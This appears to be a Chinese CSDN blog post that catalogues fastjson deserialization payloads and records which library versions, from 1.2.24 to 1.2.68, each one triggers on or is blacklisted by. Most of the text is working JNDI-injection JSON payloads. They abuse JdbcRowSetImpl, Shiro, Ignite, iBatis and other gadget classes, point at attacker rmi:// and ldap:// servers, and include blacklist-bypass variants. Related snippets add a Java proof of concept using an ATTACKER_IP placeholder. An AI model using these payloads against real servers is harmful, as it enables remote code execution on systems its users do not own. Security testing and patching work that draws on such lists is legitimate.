fastjson漏洞不同版本payload测试

已于 2022-07-11 10:22:45 修改
阅读量2.5k 收藏 2
点赞数
文章标签: java apache 服务器
于 2022-07-11 10:22:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/125716260
版权
本文记录了多个版本中JNDI配置引发报错或被拦截的情况,重点关注了不同JDBC RowSetImpl、JMS、数据库连接、Shiro等组件与JNDI的交互,以及如何根据报错策略进行版本排查和后续解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

备注说明:0:无报错无触发 1:报错但不是黑名单 2:被黑名单拦截或pop链不存在
测试版本按照顺序:1.2.24、1.2.41、1.2.42、1.2.47、1.2.62、1.2.67、1.2.68
如果连续出现两次2我就视为后续版本也不适用,不再继续检测

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
1.2.24、2、2

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
1.2.24、2、2

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
1.2.24、2、2

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
1.2.24、2、2

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
0、2、2

{"a":{"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x.x.x.x:1999/Exploit","autoCommit": true}}
1.2.24、1.2.41、1.2.42、1.2.47、2、2

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
0、2、2

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
0、2、2

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
0、2、2

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}
0、2、2

{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"rmi://39.99.154.30:1099/TouchFile"}}}
1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)

{"a":{"@type": "java.lang.AutoCloseable", "@type":"java.io.Reader"},"rand1":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dns_rmi_url"}}}
1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)、1(触发但是没有监听到)
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"dns_rmi_url"}
0、2、2

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns_rmi_url"}
0、2、2

{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"dns_rmi_url"}, "namespace":""}
0、2、2

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns_rmi_url"}}
0、2、2

{"@type":"com.caucho.config.types.ResourceRef","lookupName": "dns_rmi_url"}
0、2、2

{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["dns_rmi_url"], "Realms":[""]}
0、2、2

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns_rmi_url"}
0、2、2

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames": "dns_rmi_url"}
0、2、2

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName": "dns_rmi_url"}
0、2、2

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns_rmi_url","autoCommit":true}
1.2.14、2、2

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"test":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns_rmi_url","autoCommit":true}}}
1.2.14、1.2.41、1.2.42、1.2.47、2、2

{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns_rmi_url", "rollbackOnly":null}
0、2、2

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns_rmi_url"}
0、2、2
FastJson反序列化漏洞复现附带多个版本payload
qq_41187177的博客
09-03 4489
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本payload3.漏洞解析 1.漏洞环境搭建 打开IDEA,新建一个java web的项目 修改HelloServlet.java文件输入一下代码import java.io.*; import javax.servlet.http.*; import javax.servlet.annotation.*; import com.alibaba.fastjson.*; @W
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 4288
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastjson反序列化漏洞区分版本号的方法总结
yggcwhat
07-16 3346
fastjson反序列化漏洞区分版本号的方法总结
Java安全-FastJson反序列化分析
最新发布
m0_60442621的博客
03-31 1130
Fastjson 是阿里巴巴推出的一款高性能 JSON 序列化/反序列化库,由于其便捷性被广泛应用于 Java 项目中。 Java安全-FastJson反序列化漏洞分析
Fastjson版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/index.png) # Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/tmp.png) 2、编译Exploit.java javac
一款基于BurpSuite的被动式FastJson检测插件-BurpFastJsonScan
SuperherRo的博客
08-24 1144
一款基于BurpSuite的被动式FastJson检测插件
渗透测试-Fastjson版本漏洞分析(下)
cdyunaq的博客
04-18 4249
- fastjson 1.2.45 - 1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的 运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class, int)成功拦截 分析一下,发现如果开头是[就直接抛出异常 那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 1993
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
FastJson 漏洞.md
05-27
#### 二、Fastjson漏洞概述 Fastjson在多个版本中存在安全漏洞,主要集中在反序列化过程中,这些漏洞可能允许远程代码执行(RCE),即攻击者可以通过构造恶意的JSON数据来触发漏洞,进而执行任意代码。此类漏洞一旦...
探索Fastjson Payload:安全与利用的艺术
gitblog_00037的博客
06-10 396
探索Fastjson Payload:安全与利用的艺术 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 fastjson_payload 是一个独特的开源项目,它汇集了网络上关于Fastjson JSON反序列化漏洞的各种研究和参考资料。这个项目并非只是一个简单的代码库,而是一个知识宝库,为开发者、安全研究人员以及对Web安全感兴趣的人们提供了一个全面了解Fastj...
fastjson反序列化漏洞
m0_62207482的博客
04-10 530
在请求包里面中发送恶意的json格式payload漏洞在处理json对象的时候,没有对@type 字段进行过滤,从而导致攻击者可以传入恶意的TemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes生成java实例,这就达到fastjson通 过字段传入一个类,再通过这个类被生成时执行构造函数。着重查看标红关键字 rmi.class是Java的类文件,相较来说是恶意的。抓包登录界面添加了字符破环原始json数据发现为fastjson
fastjson版本jar包以及使用方法
07-19
https://blog.csdn.net/hykwhjc/article/details/81121224 fastJSON的使用
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}] 数组里面封装数组的反序列化方法,通过两个bean,进行封装
2023最新最全 fastjson 漏洞批量检测工具使用教程。
logic1001的博客
11-29 3632
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2562
Fastjson组件反序列化分析,从基础到RCE的过程笔记
FastJson 启发式检测
YakProject的博客
11-07 307
再看mapping,也是private类型,搜下mappings.put,发现loadClass有调用,load过的class都会存到mapping。到此大概猜出,可以用{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}先加载一遍com.sun.rowset.JdbcRowSetImpl,放进mapping缓存,下次加载com.sun.rowset.JdbcRowSetImpl可以通过缓存加载,从而绕过AutoType的限制。
fastjson反序列化漏洞利用
weixin_44414845的博客
07-13 1387
漏洞利用环境和payload参考君来自:环境搭建注意点:配置一个好的镜像源。fastjson docker环境启动和关闭。
Fastjson在实战中的检测与利用
why811的博客
10-08 4857
参考:https://github.com/alibaba/fastjson/issues/3077java.net.InetAddress这个gadget在1.2.49禁止了。如果上面这个poc可以出dnslog说明很大概率可以rce。如果以上这些poc可以出dnslog,则可以说明后端百分百是fastjson。最近发现有个容易被人弄错的地方,就是fastjsonpayload。网上的Payload,发现有的目标可以成功,有的目标不能成功,这是为什么?
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3825
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
fastjson1.2.24漏洞payload
03-17
### 关于 Fastjson 1.2.24 漏洞 Payload 示例 Fastjson 是阿里巴巴开源的一款高性能 JSON 序列化和反序列化工具,在早期版本中存在多个严重的远程代码执行 (RCE) 漏洞。这些漏洞主要源于其 `autoType` 功能未充分校验输入数据,攻击者可以通过构造恶意的 JSON 数据触发 RCE。 #### 已知漏洞背景 在 Fastjson 的 `checkAutoType` 方法中,如果某些特定条件被满足,则可能导致类型绕过并最终实现任意代码执行[^2]。以下是几个典型的场景: - **`expectClass` 参数**:当该参数不为空且不属于预定义的安全类列表时(如 Object.class 或 Serializable.class),可能允许自定义类型的实例化。 - **黑名单机制不足**:早期版本中的黑名单策略基于明文匹配,容易通过变种方式规避检测[^3]。 - **特殊字符过滤缺失**:部分修复尝试仅简单增加了一些关键字检查,但未能全面覆盖所有潜在威胁向量。 #### Payload 构造原理 针对 Fastjson 1.2.24 及更早版本,常见的利用链依赖于 Java 类加载器的行为特性以及第三方库的支持。例如,`JdbcRowSetImpl` 被广泛用于演示此类漏洞的影响。下面是一个经典的 POC 实现: ```java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.ParserConfig; public class Exploit { public static void main(String[] args) throws Exception { // 启用 autoType 支持 ParserConfig.getGlobalInstance().setAutoTypeSupport(true); // 恶意 JSON 输入字符串 String poc = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://ATTACKER_IP:1099/Exploit\",\"autoCommit\":true}"; // 执行解析操作 JSON.parse(poc); } } ``` 上述代码片段展示了如何通过指定 `@type` 属性来控制目标对象的具体类型,并结合外部资源注入完成进一步的危害扩展。 > 注意事项 > - 替换掉 `ATTACKER_IP` 占位符为你实际部署的服务地址。 > - 此测试环境需确保隔离措施到位以免造成真实损害。 --- ### 技术细节补充说明 对于更高版本修补后的防御逻辑改进点如下: - 黑名单由原来的纯文本形式转变为哈希值存储结构,从而提高了对抗变形技巧的能力; - 新增了对非法路径分隔符 (`L`, `;`) 的额外筛查环节以减少误报率的同时增强安全性保障水平。 尽管如此,开发者仍应遵循官方建议禁用全局范围内的自动类型转换功能除非绝对必要情况下才开启局部许可权限设置。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值